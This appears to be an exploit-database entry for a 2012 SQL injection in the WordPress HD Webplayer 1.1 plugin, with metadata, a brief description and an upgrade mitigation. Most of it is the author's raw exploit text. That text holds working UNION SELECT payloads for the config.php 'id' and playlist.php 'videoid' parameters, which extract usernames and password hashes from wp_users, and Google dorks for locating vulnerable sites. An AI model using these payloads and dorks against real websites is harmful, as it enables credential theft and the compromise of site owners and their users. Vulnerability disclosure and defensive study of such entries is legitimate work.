Wordpress HD Webplayer 1.1 SQL Injection

vendor:

Wordpress HD Webplayer

by:

JoinSe7en

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Wordpress HD Webplayer

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: YES

Related CWE: N/A

CPE: a:hdwebplayer:wordpress_hd_webplayer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7, Backtrack 5 r3

2012

WordPress HD Webplayer 1.1 SQL Injection

The Wordpress HD Webplayer plugin version 1.1 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords. The vulnerability exists in the config.php and playlist.php files, where an attacker can inject malicious SQL code into the 'id' and 'videoid' parameters respectively.

Mitigation:

Upgrade to the latest version of the Wordpress HD Webplayer plugin.

Source

Exploit-DB raw data:

   _______                     _____ _   _ _______ _____            
  |__   __|                   |_   _| \ | |__   __|  __ \     /\    
     | | ___  __ _ _ __ ___     | | |  \| |  | |  | |__) |   /  \   
     | |/ _ \/ _` | '_ ` _ \    | | | . ` |  | |  |  _  /   / /\ \  
     | |  __/ (_| | | | | | |  _| |_| |\  |  | |  | | \ \  / ____ \ 
     |_|\___|\__,_|_| |_| |_| |_____|_| \_|  |_|  |_|  \_\/_/    \_\
                                                          - JoinSe7en


+----------------------------------------------------------------------+
|               Wordpress HD Webplayer 1.1 SQL Injection               |
|                    Author: JoinSe7en [Team INTRA]                    |
+----------------------------------------------------------------------+

# Exploit Title: Wordpress HD Webplayer 1.1 SQL Injection
# Date: 28/08/2012
# Exploit Author: JoinSe7en
# Vendor Homepage: http://www.hdwebplayer.com/
# Software Link: http://hdwebplayer.com/downloads/hdwebplayer_wordpress_1.1.zip
# Category: Web Application 0-Day
# Version: version 1.1
# Tested on: Windows 7, Backtrack 5 r3

+----------------------------------------------------------------------+
|                     Vulnerability 1 - config.php                     |
+----------------------------------------------------------------------+

# Location:

http://site.com/wp-content/plugins/hd-webplayer/config.php?id= [INJECT HERE]

# Exploit Code:

config.php?id=1+/*!UNION*/+/*!SELECT*/+1,2,3,group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),5,6,7+from+wp_users //Number of columns may be different

+----------------------------------------------------------------------+
|                    Vulnerability 2 - playlist.php                    |
+----------------------------------------------------------------------+

# Location:

http://site.com/wp-content/plugins/hd-webplayer/playlist.php?videoid= [INJECT HERE]

# Exploit Code:

playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),2,3,4,5,6,7+from+wp_users //Number of columns may be different

+----------------------------------------------------------------------+
|                             Google Dork                              |
+----------------------------------------------------------------------+

There are 3 different usefull dorks to use:

# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"

+----------------------------------------------------------------------+

Greetz to all members of Team INTRA <3